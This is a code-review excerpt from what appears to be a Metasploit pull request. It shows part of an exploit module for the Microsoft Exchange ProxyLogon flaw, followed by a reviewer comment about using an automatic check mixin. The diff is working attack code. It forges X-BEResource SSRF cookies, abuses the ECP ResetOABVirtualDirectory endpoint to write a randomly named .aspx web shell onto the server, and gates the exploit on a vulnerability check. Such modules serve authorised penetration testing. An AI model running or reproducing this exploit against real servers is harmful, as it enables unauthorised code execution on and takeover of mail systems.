modules/exploits/windows/http/exchange_proxylogon_rce.rb

```diff
@@ -0,0 +1,532 @@
+    ssrf = "X-BEResource=#{ssrf};"
+    if cookie
+      cookie = "#{ssrf} #{cookie}"
+    else
+      cookie = ssrf.to_s
+    end
+
+    ctype = 'application/x-www-form-urlencoded' if ctype.empty?
+
+    request = {
+      'method' => method,
+      'uri' => @random_uri,
+      'agent' => datastore['UserAgent'],
+      'ctype' => ctype
+    }
+    request = request.merge({ 'data' => data }) unless data.empty?
+    request = request.merge({ 'cookie' => cookie }) unless cookie.empty?
+    request = request.merge({ 'headers' => headers }) unless headers.empty?
+
+    received = send_request_cgi(request)
+    fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received
+
+    received
+  end
+
+  def soap_autodiscover
+    <<~SOAP
+      <?xml version="1.0" encoding="utf-8"?>
+      <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
+        <Request>
+          <EMailAddress>#{datastore['EMAIL']}</EMailAddress>
+          <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
+        </Request>
+      </Autodiscover>
+    SOAP
+  end
+
+  def write_payload(exploit_info)
+    # exploit_info: [server_name, sid, session, canary, oab_id]
+    remote_file = "#{rand_text_alpha(4..8)}.aspx"
+    remote_path = "#{datastore['ExchangeBasePath'].split(':')[1]}\\FrontEnd\\HttpProxy\\#{datastore['ExchangeWritePath']}"
+    remote_path = "\\\\127.0.0.1\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\#{remote_file}"
+
+    data = {
+      'identity': {
+        '__type': 'Identity:ECP',
+        'DisplayName': (exploit_info[4][0]).to_s,
+        'RawIdentity': (exploit_info[4][1]).to_s
+      },
+      'properties': {
+        'Parameters': {
+          '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
+          'FilePathName': remote_path.to_s
+        }
+      }
+    }.to_json
+
+    response = send_http(
+      'POST',
+      "Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~1942062522",
+      data: data,
+      cookie: exploit_info[2],
+      ctype: 'application/json; charset=utf-8',
+      headers: {
+        'msExchLogonMailbox' => patch_sid(exploit_info[1]),
+        'msExchTargetMailbox' => patch_sid(exploit_info[1]),
+        'X-vDirObjectId' => (exploit_info[4][1]).to_s
+      }
+    )
+    return '' if response.code != 200
+
+    remote_file
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      case check
+      when CheckCode::Vulnerable
+        print_good('The target appears to be vulnerable')
+      when CheckCode::Safe
+        fail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable')
+      else
+        fail_with(Failure::Unknown, 'The target vulnerability state is unknown')
+      end
+    end
```

Comment:
We are now using the `Msf::Exploit::Remote::AutoCheck` mixin to automatically handle the `check` method. You just have to add this at the top of the class and remove this entire block:
```
  prepend Msf::Exploit::Remote::AutoCheck
```